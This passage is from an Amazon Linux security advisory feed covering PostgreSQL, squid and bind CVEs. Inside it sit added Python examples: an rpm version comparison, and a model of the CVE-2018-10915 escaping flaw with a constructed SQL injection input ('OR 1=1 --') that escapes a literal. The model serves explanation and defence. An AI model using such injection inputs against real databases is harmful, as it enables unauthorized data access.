</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10915" title="" id="CVE-2018-10915" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10925" title="" id="CVE-2018-10925" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="postgresql94-plpython26" version="9.4.19" release="1.75.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql94-plpython26-9.4.19-1.75.amzn1.x86_64.rpm</filename></package><package name="postgresql94-contrib" version="9.4.19" release="1.75.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql94-contrib-9.4.19-1.75.amzn1.x86_64.rpm</filename></package><package name="postgresql94-plpython27" version="9.4.19" release="1.75.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql94-plpython27-9.4.19-1.75.amzn1.x86_64.rpm</filename></package><package name="postgresql94-libs" version="9.4.19" release="1.75.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql94-libs-9.4.19-1.75.amzn1.x86_64.rpm</filename></package><package name="postgresql94-docs" version="9.4.19" release="1.75.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql94-docs-9.4.19-1.75.amzn1.x86_64.rpm</filename></package><package name="postgresql94-devel" version="9.4.19" release="1.75.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql94-devel-9.4.19-1.75.amzn1.x86_64.rpm</filename></package><package name="postgresql94-test" version="9.4.19" release="1.75.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql94-test-9.4.19-1.75.amzn1.x86_64.rpm</filename></package><package name="postgresql94-debuginfo" version="9.4.19" release="1.75.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql94-debuginfo-9.4.19-1.75.amzn1.x86_64.rpm</filename></package><package name="postgresql94-server" version="9.4.19" release="1.75.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/postgresql94-server-9.4.19-1.75.amzn1.x86_64.rpm</filename></package><package name="postgresql94-plperl" version="9.4.19" release="1.75.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql94-plperl-9.4.19-1.75.amzn1.x86_64.rpm</filename></package><package name="postgresql94" version="9.4.19" release="1.75.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql94-9.4.19-1.75.amzn1.x86_64.rpm</filename></package><package name="postgresql94-libs" version="9.4.19" release="1.75.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql94-libs-9.4.19-1.75.amzn1.i686.rpm</filename></package><package name="postgresql94-plpython27" version="9.4.19" release="1.75.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql94-plpython27-9.4.19-1.75.amzn1.i686.rpm</filename></package><package name="postgresql94" version="9.4.19" release="1.75.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql94-9.4.19-1.75.amzn1.i686.rpm</filename></package><package name="postgresql94-debuginfo" version="9.4.19" release="1.75.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql94-debuginfo-9.4.19-1.75.amzn1.i686.rpm</filename></package><package name="postgresql94-plpython26" version="9.4.19" release="1.75.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql94-plpython26-9.4.19-1.75.amzn1.i686.rpm</filename></package><package name="postgresql94-contrib" version="9.4.19" release="1.75.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql94-contrib-9.4.19-1.75.amzn1.i686.rpm</filename></package><package name="postgresql94-devel" version="9.4.19" release="1.75.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql94-devel-9.4.19-1.75.amzn1.i686.rpm</filename></package><package name="postgresql94-test" version="9.4.19" release="1.75.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql94-test-9.4.19-1.75.amzn1.i686.rpm</filename></package><package name="postgresql94-plperl" version="9.4.19" release="1.75.amzn1" epoch="0" 
arch="i686"><filename>Packages/postgresql94-plperl-9.4.19-1.75.amzn1.i686.rpm</filename></package><package name="postgresql94-docs" version="9.4.19" release="1.75.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql94-docs-9.4.19-1.75.amzn1.i686.rpm</filename></package><package name="postgresql94-server" version="9.4.19" release="1.75.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql94-server-9.4.19-1.75.amzn1.i686.rpm</filename></package><package name="postgresql93-plpython27" version="9.3.24" release="1.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-plpython27-9.3.24-1.71.amzn1.x86_64.rpm</filename></package><package name="postgresql93-libs" version="9.3.24" release="1.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-libs-9.3.24-1.71.amzn1.x86_64.rpm</filename></package><package name="postgresql93-pltcl" version="9.3.24" release="1.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-pltcl-9.3.24-1.71.amzn1.x86_64.rpm</filename></package><package name="postgresql93-test" version="9.3.24" release="1.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-test-9.3.24-1.71.amzn1.x86_64.rpm</filename></package><package name="postgresql93" version="9.3.24" release="1.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-9.3.24-1.71.amzn1.x86_64.rpm</filename></package><package name="postgresql93-server" version="9.3.24" release="1.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-server-9.3.24-1.71.amzn1.x86_64.rpm</filename></package><package name="postgresql93-debuginfo" version="9.3.24" release="1.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-debuginfo-9.3.24-1.71.amzn1.x86_64.rpm</filename></package><package name="postgresql93-devel" version="9.3.24" release="1.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-devel-9.3.24-1.71.amzn1.x86_64.rpm</filename></package><package name="postgresql93-contrib" version="9.3.24" 
release="1.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-contrib-9.3.24-1.71.amzn1.x86_64.rpm</filename></package><package name="postgresql93-plperl" version="9.3.24" release="1.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-plperl-9.3.24-1.71.amzn1.x86_64.rpm</filename></package><package name="postgresql93-plpython26" version="9.3.24" release="1.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-plpython26-9.3.24-1.71.amzn1.x86_64.rpm</filename></package><package name="postgresql93-docs" version="9.3.24" release="1.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-docs-9.3.24-1.71.amzn1.x86_64.rpm</filename></package><package name="postgresql93-plpython26" version="9.3.24" release="1.71.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-plpython26-9.3.24-1.71.amzn1.i686.rpm</filename></package><package name="postgresql93" version="9.3.24" release="1.71.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-9.3.24-1.71.amzn1.i686.rpm</filename></package><package name="postgresql93-contrib" version="9.3.24" release="1.71.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-contrib-9.3.24-1.71.amzn1.i686.rpm</filename></package><package name="postgresql93-plperl" version="9.3.24" release="1.71.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-plperl-9.3.24-1.71.amzn1.i686.rpm</filename></package><package name="postgresql93-docs" version="9.3.24" release="1.71.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-docs-9.3.24-1.71.amzn1.i686.rpm</filename></package><package name="postgresql93-pltcl" version="9.3.24" release="1.71.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-pltcl-9.3.24-1.71.amzn1.i686.rpm</filename></package><package name="postgresql93-test" version="9.3.24" release="1.71.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-test-9.3.24-1.71.amzn1.i686.rpm</filename></package><package name="postgresql93-libs" 
version="9.3.24" release="1.71.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-libs-9.3.24-1.71.amzn1.i686.rpm</filename></package><package name="postgresql93-debuginfo" version="9.3.24" release="1.71.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-debuginfo-9.3.24-1.71.amzn1.i686.rpm</filename></package><package name="postgresql93-plpython27" version="9.3.24" release="1.71.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-plpython27-9.3.24-1.71.amzn1.i686.rpm</filename></package><package name="postgresql93-server" version="9.3.24" release="1.71.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-server-9.3.24-1.71.amzn1.i686.rpm</filename></package><package name="postgresql93-devel" version="9.3.24" release="1.71.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-devel-9.3.24-1.71.amzn1.i686.rpm</filename></package><package name="postgresql95-plpython27" version="9.5.14" release="1.79.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql95-plpython27-9.5.14-1.79.amzn1.x86_64.rpm</filename></package><package name="postgresql95-debuginfo" version="9.5.14" release="1.79.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql95-debuginfo-9.5.14-1.79.amzn1.x86_64.rpm</filename></package><package name="postgresql95-plperl" version="9.5.14" release="1.79.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql95-plperl-9.5.14-1.79.amzn1.x86_64.rpm</filename></package><package name="postgresql95-static" version="9.5.14" release="1.79.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql95-static-9.5.14-1.79.amzn1.x86_64.rpm</filename></package><package name="postgresql95-docs" version="9.5.14" release="1.79.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql95-docs-9.5.14-1.79.amzn1.x86_64.rpm</filename></package><package name="postgresql95-plpython26" version="9.5.14" release="1.79.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/postgresql95-plpython26-9.5.14-1.79.amzn1.x86_64.rpm</filename></package><package name="postgresql95" version="9.5.14" release="1.79.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql95-9.5.14-1.79.amzn1.x86_64.rpm</filename></package><package name="postgresql95-devel" version="9.5.14" release="1.79.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql95-devel-9.5.14-1.79.amzn1.x86_64.rpm</filename></package><package name="postgresql95-libs" version="9.5.14" release="1.79.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql95-libs-9.5.14-1.79.amzn1.x86_64.rpm</filename></package><package name="postgresql95-test" version="9.5.14" release="1.79.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql95-test-9.5.14-1.79.amzn1.x86_64.rpm</filename></package><package name="postgresql95-server" version="9.5.14" release="1.79.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql95-server-9.5.14-1.79.amzn1.x86_64.rpm</filename></package><package name="postgresql95-contrib" version="9.5.14" release="1.79.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql95-contrib-9.5.14-1.79.amzn1.x86_64.rpm</filename></package><package name="postgresql95-test" version="9.5.14" release="1.79.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql95-test-9.5.14-1.79.amzn1.i686.rpm</filename></package><package name="postgresql95-static" version="9.5.14" release="1.79.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql95-static-9.5.14-1.79.amzn1.i686.rpm</filename></package><package name="postgresql95-server" version="9.5.14" release="1.79.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql95-server-9.5.14-1.79.amzn1.i686.rpm</filename></package><package name="postgresql95-devel" version="9.5.14" release="1.79.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql95-devel-9.5.14-1.79.amzn1.i686.rpm</filename></package><package name="postgresql95-plpython27" version="9.5.14" release="1.79.amzn1" 
epoch="0" arch="i686"><filename>Packages/postgresql95-plpython27-9.5.14-1.79.amzn1.i686.rpm</filename></package><package name="postgresql95-libs" version="9.5.14" release="1.79.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql95-libs-9.5.14-1.79.amzn1.i686.rpm</filename></package><package name="postgresql95-plperl" version="9.5.14" release="1.79.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql95-plperl-9.5.14-1.79.amzn1.i686.rpm</filename></package><package name="postgresql95-docs" version="9.5.14" release="1.79.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql95-docs-9.5.14-1.79.amzn1.i686.rpm</filename></package><package name="postgresql95" version="9.5.14" release="1.79.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql95-9.5.14-1.79.amzn1.i686.rpm</filename></package><package name="postgresql95-contrib" version="9.5.14" release="1.79.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql95-contrib-9.5.14-1.79.amzn1.i686.rpm</filename></package><package name="postgresql95-debuginfo" version="9.5.14" release="1.79.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql95-debuginfo-9.5.14-1.79.amzn1.i686.rpm</filename></package><package name="postgresql95-plpython26" version="9.5.14" release="1.79.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql95-plpython26-9.5.14-1.79.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-1080</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-1080: important priority package update for postgresql92</title><issued date="2018-09-19 17:08:00" /><updated date="2018-09-19 23:32:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-10915:
A vulnerability was found in libpq, the default PostgreSQL client library, where libpq failed to properly reset its internal state between connections. If an affected version of libpq were used with &quot;host&quot; or &quot;hostaddr&quot; connection parameters from untrusted input, attackers could bypass client-side connection security features, obtain access to higher-privileged connections or potentially cause other impact through SQL injection, by causing the PQescape() functions to malfunction.
1609891:
CVE-2018-10915 postgresql: Certain host connection parameters defeat client-side security defenses
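The following is an added example, not libpq or PostgreSQL code, that models the class of PQescape() malfunction described for CVE-2018-10915 here and in ALAS-2018-1079 above: an escaping routine whose output depends on per-connection state produces a string that the server tokenizes differently when that state is stale. The modelled state is the standard_conforming_strings setting, which is an assumption for the illustration; the table name, the ATTACK input and all function names are constructed.

```python
# Added illustration of the PQescape() failure mode described above. This is
# a model, not libpq: it assumes that the stale per-connection state is the
# cached standard_conforming_strings (scs) setting.

def escape_literal(value, client_scs):
    '''Escape a string for use inside a single-quoted SQL literal the way a
    PQescapeStringConn-style routine does, based on what the CLIENT believes
    standard_conforming_strings to be.'''
    out = value
    if not client_scs:
        # With scs off the server treats backslash as an escape character,
        # so backslashes must be doubled before quotes are handled.
        out = out.replace('\\', '\\\\')
    return out.replace("'", "''")

def server_scan_literal(sql, server_scs):
    '''Scan a single-quoted literal starting at sql[0] the way the server
    lexer would, given the SERVER's actual scs setting. Returns
    (decoded_value, text_after_closing_quote).'''
    if sql[0] != "'":
        raise ValueError('expected opening quote')
    buf = []
    i, n = 1, len(sql)
    while i != n:
        c = sql[i]
        if c == "'":
            if i + 1 != n and sql[i + 1] == "'":
                buf.append("'")          # doubled quote is a literal quote
                i += 2
                continue
            return ''.join(buf), sql[i + 1:]
        if c == '\\' and not server_scs and i + 1 != n:
            buf.append(sql[i + 1])       # backslash escape: take next char
            i += 2
            continue
        buf.append(c)
        i += 1
    raise ValueError('unterminated literal')

def run_query(user_input, client_scs, server_scs):
    '''Build the query with the client's escaping, then parse it with the
    server's rules. Returns (value the server decoded, trailing SQL).
    Trailing SQL other than the empty string means the input broke out of
    the literal, i.e. injection.'''
    sql = ("SELECT * FROM accounts WHERE name = '"
           + escape_literal(user_input, client_scs) + "'")
    return server_scan_literal(sql[sql.index("'"):], server_scs)

def injected(user_input, client_scs, server_scs):
    '''True when the client/server state mismatch lets the input escape.'''
    _, trailing = run_query(user_input, client_scs, server_scs)
    return trailing != ''

ATTACK = "\\' OR 1=1 --"    # constructed attacker-controlled input

if __name__ == '__main__':
    # Third case: client still believes the previous connection's scs=on
    # while the server it is now talking to runs scs=off.
    for client_scs, server_scs in [(True, True), (False, False), (True, False)]:
        value, trailing = run_query(ATTACK, client_scs, server_scs)
        print(f'client scs={client_scs} server scs={server_scs}: '
              f'value={value!r} trailing={trailing!r}')
```

Only the mismatched case yields trailing SQL; with matching state the quote stays inside the literal. The defensive takeaway is that any per-connection escaping state must be re-learned from the server on every (re)connection rather than inherited from the previous one.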
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10915" title="" id="CVE-2018-10915" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="postgresql92-contrib" version="9.2.24" release="2.66.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-contrib-9.2.24-2.66.amzn1.x86_64.rpm</filename></package><package name="postgresql92-server" version="9.2.24" release="2.66.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-server-9.2.24-2.66.amzn1.x86_64.rpm</filename></package><package name="postgresql92-test" version="9.2.24" release="2.66.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-test-9.2.24-2.66.amzn1.x86_64.rpm</filename></package><package name="postgresql92-libs" version="9.2.24" release="2.66.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-libs-9.2.24-2.66.amzn1.x86_64.rpm</filename></package><package name="postgresql92-plpython27" version="9.2.24" release="2.66.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-plpython27-9.2.24-2.66.amzn1.x86_64.rpm</filename></package><package name="postgresql92-debuginfo" version="9.2.24" release="2.66.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-debuginfo-9.2.24-2.66.amzn1.x86_64.rpm</filename></package><package name="postgresql92-server-compat" version="9.2.24" release="2.66.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-server-compat-9.2.24-2.66.amzn1.x86_64.rpm</filename></package><package name="postgresql92-pltcl" version="9.2.24" release="2.66.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-pltcl-9.2.24-2.66.amzn1.x86_64.rpm</filename></package><package name="postgresql92-docs" version="9.2.24" release="2.66.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-docs-9.2.24-2.66.amzn1.x86_64.rpm</filename></package><package name="postgresql92" version="9.2.24" release="2.66.amzn1" 
epoch="0" arch="x86_64"><filename>Packages/postgresql92-9.2.24-2.66.amzn1.x86_64.rpm</filename></package><package name="postgresql92-plpython26" version="9.2.24" release="2.66.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-plpython26-9.2.24-2.66.amzn1.x86_64.rpm</filename></package><package name="postgresql92-plperl" version="9.2.24" release="2.66.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-plperl-9.2.24-2.66.amzn1.x86_64.rpm</filename></package><package name="postgresql92-devel" version="9.2.24" release="2.66.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-devel-9.2.24-2.66.amzn1.x86_64.rpm</filename></package><package name="postgresql92-server" version="9.2.24" release="2.66.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-server-9.2.24-2.66.amzn1.i686.rpm</filename></package><package name="postgresql92-libs" version="9.2.24" release="2.66.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-libs-9.2.24-2.66.amzn1.i686.rpm</filename></package><package name="postgresql92-server-compat" version="9.2.24" release="2.66.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-server-compat-9.2.24-2.66.amzn1.i686.rpm</filename></package><package name="postgresql92-contrib" version="9.2.24" release="2.66.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-contrib-9.2.24-2.66.amzn1.i686.rpm</filename></package><package name="postgresql92-plpython27" version="9.2.24" release="2.66.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-plpython27-9.2.24-2.66.amzn1.i686.rpm</filename></package><package name="postgresql92-docs" version="9.2.24" release="2.66.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-docs-9.2.24-2.66.amzn1.i686.rpm</filename></package><package name="postgresql92-devel" version="9.2.24" release="2.66.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-devel-9.2.24-2.66.amzn1.i686.rpm</filename></package><package name="postgresql92-debuginfo" 
version="9.2.24" release="2.66.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-debuginfo-9.2.24-2.66.amzn1.i686.rpm</filename></package><package name="postgresql92-pltcl" version="9.2.24" release="2.66.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-pltcl-9.2.24-2.66.amzn1.i686.rpm</filename></package><package name="postgresql92" version="9.2.24" release="2.66.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-9.2.24-2.66.amzn1.i686.rpm</filename></package><package name="postgresql92-plperl" version="9.2.24" release="2.66.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-plperl-9.2.24-2.66.amzn1.i686.rpm</filename></package><package name="postgresql92-plpython26" version="9.2.24" release="2.66.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-plpython26-9.2.24-2.66.amzn1.i686.rpm</filename></package><package name="postgresql92-test" version="9.2.24" release="2.66.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-test-9.2.24-2.66.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-1081</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-1081: medium priority package update for squid</title><issued date="2018-09-19 17:10:00" /><updated date="2018-09-19 23:33:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-1000027:
Squid HTTP Caching Proxy versions prior to 4.0.23 contain a NULL pointer dereference vulnerability in HTTP response X-Forwarded-For header processing that can result in denial of service to all clients of the proxy. The attack appears to be exploitable by a remote HTTP server responding with an X-Forwarded-For header to certain types of HTTP request. The vulnerability is fixed in 4.0.23 and later.
1536942:
CVE-2018-1000027 squid: Incorrect pointer handling in HTTP processing and certificate download can lead to denial of service
CVE-2018-1000024:
Squid HTTP Caching Proxy versions 3.0 to 3.5.27 and 4.0 to 4.0.22 contain an incorrect pointer handling vulnerability in ESI response processing that can result in denial of service for all clients using the proxy. The attack appears to be exploitable by a remote server delivering an HTTP response payload containing valid but unusual ESI syntax. The vulnerability is fixed in 4.0.23 and later.
1536939:
CVE-2018-1000024 squid: Incorrect pointer handling when processing ESI Responses can lead to denial of service
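Whether this advisory applies to a host is decided by comparing the pkglist epoch, version and release against the installed package, and the epoch dominates: squid here carries epoch 7 and the bind advisory below epoch 32, so a locally built squid 4.0.23 with no epoch still counts as older than 7:3.5.20-11.35.amzn1. The following is an added example, not yum or rpm code: a port of the rpmvercmp() ordering rules so that applicability can be checked offline. The SQUID_ADVISORY_EVR and BIND_ADVISORY_EVR values are taken from this file; the installed versions in the demo are constructed.

```python
# Added example, not yum or rpm code: a port of rpm's version comparison so
# the applicability of an advisory's pkglist can be checked offline.
import operator
import re

SQUID_ADVISORY_EVR = (7, '3.5.20', '11.35.amzn1')          # from this advisory
BIND_ADVISORY_EVR = (32, '9.8.2', '0.68.rc1.58.amzn1')     # from ALAS-2018-1082

def _segments(s):
    '''Split a version string into digit runs, letter runs and tildes;
    every other character is a separator and is dropped.'''
    return re.findall(r'[0-9]+|[a-zA-Z]+|~', s)

def rpmvercmp(a, b):
    '''Port of rpmvercmp(): -1 if a is older than b, 0 if equal, 1 if newer.
    Digit runs compare numerically, letter runs lexically, a digit run beats
    a letter run, a leftover segment beats end of string, and tilde sorts
    before everything (so 1.0~rc1 is older than 1.0). The caret operator of
    newer rpm releases is not modelled.'''
    if a == b:
        return 0
    ta, tb = _segments(a), _segments(b)
    while ta or tb:
        x = ta[0] if ta else ''
        y = tb[0] if tb else ''
        if x == '~' or y == '~':
            if x != y:
                return -1 if x == '~' else 1
            ta.pop(0)
            tb.pop(0)
            continue
        if not ta or not tb:
            return 1 if ta else -1
        ta.pop(0)
        tb.pop(0)
        if x.isdigit() != y.isdigit():
            return 1 if x.isdigit() else -1
        if x.isdigit():
            x, y = int(x), int(y)
        if x != y:
            return 1 if operator.gt(x, y) else -1
    return 0

def evr_cmp(installed, advisory):
    '''Compare (epoch, version, release) tuples the way rpm does: epoch
    decides first, then version, then release. A None epoch counts as 0.'''
    (ea, va, ra), (eb, vb, rb) = installed, advisory
    ea, eb = int(ea or 0), int(eb or 0)
    if ea != eb:
        return 1 if operator.gt(ea, eb) else -1
    return rpmvercmp(va, vb) or rpmvercmp(ra, rb)

def needs_update(installed, advisory):
    '''True when the installed EVR is older than the one the advisory ships.'''
    return evr_cmp(installed, advisory) == -1

if __name__ == '__main__':
    # Constructed installed versions: one release behind, current, and a
    # locally built squid 4.0.23 packaged without an epoch.
    for installed in [(7, '3.5.20', '11.34.amzn1'),
                      (7, '3.5.20', '11.35.amzn1'),
                      (0, '4.0.23', '1.amzn1')]:
        print(installed, 'needs update:', needs_update(installed, SQUID_ADVISORY_EVR))
```

The third demo case is the one that surprises people: upstream 4.0.23 already contains the fix, but because its package has epoch 0 it sorts below the distribution build and yum will offer to replace it. When rebuilding a package locally, carry the distribution epoch forward, or the advisory matching in this file will misreport it.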
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1000024" title="" id="CVE-2018-1000024" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1000027" title="" id="CVE-2018-1000027" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="squid-debuginfo" version="3.5.20" release="11.35.amzn1" epoch="7" arch="x86_64"><filename>Packages/squid-debuginfo-3.5.20-11.35.amzn1.x86_64.rpm</filename></package><package name="squid" version="3.5.20" release="11.35.amzn1" epoch="7" arch="x86_64"><filename>Packages/squid-3.5.20-11.35.amzn1.x86_64.rpm</filename></package><package name="squid-migration-script" version="3.5.20" release="11.35.amzn1" epoch="7" arch="x86_64"><filename>Packages/squid-migration-script-3.5.20-11.35.amzn1.x86_64.rpm</filename></package><package name="squid" version="3.5.20" release="11.35.amzn1" epoch="7" arch="i686"><filename>Packages/squid-3.5.20-11.35.amzn1.i686.rpm</filename></package><package name="squid-migration-script" version="3.5.20" release="11.35.amzn1" epoch="7" arch="i686"><filename>Packages/squid-migration-script-3.5.20-11.35.amzn1.i686.rpm</filename></package><package name="squid-debuginfo" version="3.5.20" release="11.35.amzn1" epoch="7" arch="i686"><filename>Packages/squid-debuginfo-3.5.20-11.35.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-1082</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-1082: important priority package update for bind</title><issued date="2018-09-19 17:17:00" /><updated date="2018-09-19 23:34:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-5740:
A denial of service flaw was discovered in bind versions that include the &quot;deny-answer-aliases&quot; feature. This flaw may allow a remote attacker to trigger an INSIST assert in named leading to termination of the process and a denial of service condition.
1613595:
CVE-2018-5740 bind: processing of certain records when "deny-answer-aliases" is in use may trigger an assert leading to a denial of service
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5740" title="" id="CVE-2018-5740" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="bind-libs" version="9.8.2" release="0.68.rc1.58.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-libs-9.8.2-0.68.rc1.58.amzn1.x86_64.rpm</filename></package><package name="bind-devel" version="9.8.2" release="0.68.rc1.58.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-devel-9.8.2-0.68.rc1.58.amzn1.x86_64.rpm</filename></package><package name="bind-utils" version="9.8.2" release="0.68.rc1.58.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-utils-9.8.2-0.68.rc1.58.amzn1.x86_64.rpm</filename></package><package name="bind" version="9.8.2" release="0.68.rc1.58.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-9.8.2-0.68.rc1.58.amzn1.x86_64.rpm</filename></package><package name="bind-chroot" version="9.8.2" release="0.68.rc1.58.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-chroot-9.8.2-0.68.rc1.58.amzn1.x86_64.rpm</filename></package><package name="bind-sdb" version="9.8.2" release="0.68.rc1.58.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-sdb-9.8.2-0.68.rc1.58.amzn1.x86_64.rpm</filename></package><package name="bind-debuginfo" version="9.8.2" release="0.68.rc1.58.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-debuginfo-9.8.2-0.68.rc1.58.amzn1.x86_64.rpm</filename></package><package name="bind-chroot" version="9.8.2" release="0.68.rc1.58.amzn1" epoch="32" arch="i686"><filename>Packages/bind-chroot-9.8.2-0.68.rc1.58.amzn1.i686.rpm</filename></package><package name="bind-utils" version="9.8.2" release="0.68.rc1.58.amzn1" epoch="32" arch="i686"><filename>Packages/bind-utils-9.8.2-0.68.rc1.58.amzn1.i686.rpm</filename></package><package name="bind-debuginfo" version="9.8.2" release="0.68.rc1.58.amzn1" epoch="32" 
